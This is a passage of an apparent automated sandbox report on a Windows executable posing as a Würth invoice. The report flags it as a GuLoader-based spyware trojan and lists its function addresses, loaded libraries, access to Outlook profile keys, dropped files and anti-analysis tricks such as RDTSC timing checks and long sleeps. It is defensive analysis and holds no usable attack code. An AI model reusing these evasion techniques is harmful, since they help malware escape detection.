Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69AD10	4_2_3A69AD10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69DF10	4_2_3A69DF10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69DBF0	4_2_3A69DBF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69A9F0	4_2_3A69A9F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69F1D0	4_2_3A69F1D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6909D0	4_2_3A6909D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A698DD0	4_2_3A698DD0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69BFD0	4_2_3A69BFD0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6909BF	4_2_3A6909BF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69D5B0	4_2_3A69D5B0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69A3B0	4_2_3A69A3B0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69B990	4_2_3A69B990
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A698790	4_2_3A698790
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69EB90	4_2_3A69EB90
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A811B50	4_2_3A811B50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A813008	4_2_3A813008
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A8136F0	4_2_3A8136F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A811470	4_2_3A811470
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A812920	4_2_3A812920
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A810D88	4_2_3A810D88
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A812238	4_2_3A812238
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A811B3F	4_2_3A811B3F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A8136E1	4_2_3A8136E1
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A811460	4_2_3A811460
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A810A10	4_2_3A810A10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A8108DE	4_2_3A8108DE
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A812911	4_2_3A812911
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A810960	4_2_3A810960
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A812FFA	4_2_3A812FFA
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A810D7A	4_2_3A810D7A
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A812229	4_2_3A812229
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A810007	4_2_3A810007
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A810040	4_2_3A810040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A9038D0	4_2_3A9038D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A901A20	4_2_3A901A20
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A909130	4_2_3A909130
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A902638	4_2_3A902638

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Code function: String function: 00402BBF appears 51 times

Sample file is different than original file name gathered from version info

Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Wuerth_factura_4052073226..exe
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296370437.0000000037207000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Wuerth_factura_4052073226..exe

Uses 32bit PE files

Source: Wuerth_factura_4052073226..exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/6@5/5

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040327D
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_004032B2 lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		4_2_004032B2

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Code function: 0_2_0040458C GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_0040458C

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

File created: C:\Users\user\Sympodia

Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

File created: C:\Users\user\AppData\Local\Temp\nsp5FF1.tmp

Jump to behavior

Source: Wuerth_factura_4052073226..exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Wuerth_factura_4052073226..exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

File read: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe "C:\Users\user\Desktop\Wuerth_factura_4052073226..exe"
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process created: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe "C:\Users\user\Desktop\Wuerth_factura_4052073226..exe"
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process created: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe "C:\Users\user\Desktop\Wuerth_factura_4052073226..exe"	Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Wuerth_factura_4052073226..exe

Static file information: File size 1085283 > 1048576

Source: Wuerth_factura_4052073226..exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.2534956936.0000000005BC2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3272331155.0000000002F22000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_10002DE0 push eax; ret	0_2_10002E0E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D9C30 push esp; retf 0018h	4_2_000D9D55
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D48F8 push eax; ret	4_2_000D4912
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D4928 push eax; ret	4_2_000D4912
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D4928 push eax; ret	4_2_000D4922
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D4928 push eax; ret	4_2_000D4962
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D4968 push eax; ret	4_2_000D4972
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D4978 push eax; ret	4_2_000D4982
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D4988 push eax; ret	4_2_000D4992
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D4A2D push eax; ret	4_2_000D4962
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB4FA3 push FFFFFFB6h; iretd	4_2_39DB4FA5
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBC6A3 push 0000003Fh; iretd	4_2_39DBC6A5
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A9036B8 push es; retf	4_2_3A9036A7

Drops PE files

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

File created: C:\Users\user\AppData\Local\Temp\nsf6188.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	API/Special instruction interceptor: Address: 5E76E5E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	API/Special instruction interceptor: Address: 31D6E5E

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	RDTSC instruction interceptor: First address: 5E3D66E second address: 5E3D66E instructions: 0x00000000 rdtsc 0x00000002 test bh, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F13D4DAA198h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	RDTSC instruction interceptor: First address: 319D66E second address: 319D66E instructions: 0x00000000 rdtsc 0x00000002 test bh, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F13D522C168h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Memory allocated: D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Memory allocated: 37400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Memory allocated: 37310000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599436	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598124	Jump to behavior
